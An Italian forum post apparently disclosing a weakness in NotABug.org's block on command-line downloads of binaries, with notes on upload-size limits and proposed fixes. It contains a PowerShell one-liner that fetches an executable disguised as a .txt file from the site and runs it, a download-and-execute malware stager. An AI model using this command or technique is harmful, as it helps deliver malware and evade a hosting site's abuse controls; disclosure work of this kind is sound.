Articolo L'insicurezza Informatica - Sito web di file uploading "NotABug.org" & extension bypass flaw

Netcat

Helper
17 Gennaio 2022
516
144
375
716
Ultima modifica:
Incredibile ma vero, sono Helper su Inforge. Sono onestissimo con me stesso, da script kiddie ritardato sono diventato un pr0, e tutto questo grazie allo studio: ho qua una ZIP che contiene 12 GB di ricerche. La ZIP è corrotta e non si può più aprire, ma continuo a tenerla per ricordo 🖤

Bene ragazzi, quest'oggi parliamo di "file extension bypass vulnerability" su NotABug.org
I siti web di file uploading sono difficili da amministrare. Come si gestiscono?

In generale, non per "NotABug.org", nel gestire un sito di file uploading si fanno queste cose:
1. Impostare un limite massimo ai file da uppare, per impedire di dossare il server inviando una bomba da 1 Terabyte;
2. Controllo delle estensioni, per impedire di caricare un file PHP spacciato per JPEG ad esempio;
3. Il limite massimo ai file da uppare può essere bypassato dall'attaccante inviando il file da 1 Terabyte "spezzato" in più parti: ad esempio il server risponde "Puoi massimo caricare un file che pesa 10 MB", e io continuerò a caricare ripetutamente una serie di file che pesano 10 MB, fino a raggiungere 1 Terabyte, e ottenere il DOS anche con la misura di sicurezza in atto. Per impedire che ciò accada, oltre ad impostare il max limit, impostiamo un secondo limite al NUMERO di file che si possono caricare ogni giorno, e un CRONJOB che ogni tot svuota la cronologia del server, per impedire il sovraccarico dell'hard disk.

Resoconto di ciò che ho scoperto su "NotABug.org"
L'amministratore di questo sito, desidera che il suo server non venga usato come "second stage of exploitation", cioè come strumento intermedio per trasmettere un malware. Il "first stage" è un comando, o un file batch che invoca un metodo (powershell, certutil, curl ecc.) per scaricare il malware dal sito di file uploading

NotABug.org per combattere questa situazione, ha implementato un meccanismo che previene ai file binary (.exe .elf .macho) di essere scaricati tramite terminal-tools. I file con queste estensioni li fa scaricare solo tramite browser. Comunque, i file con altre estensioni (.txt, .jpg ecc.) possono essere scaricati liberamente da cmd... Davvero?

Metodo di Bypass:
Sai che c'è? Faccio questo (converto il binary in un .txt , la struttura interna non cambia):
Codice:
powershell -Command "(New-Object Net.WebClient).DownloadFile('http://NotABug/your_account/Evil_Scorpio.txt', 'Painful_Sting.exe'); Start-Process 'Painful_Sting.exe'"

Come risolvere la vulnerabilità?
1. Impedire ai file di ogni estensione di essere scaricati tramite gli strumenti nativi di Windows/Linux/Mac è la soluzione.
2. Si potrà implementare inoltre un Client dedicato shippabile con un installer, come fa Github: questo perché NotABug.org è un sito inteso per funzionare in modo simile a Github. Sono entrambi dei siti di sharing dei codici.

Grazie 🖤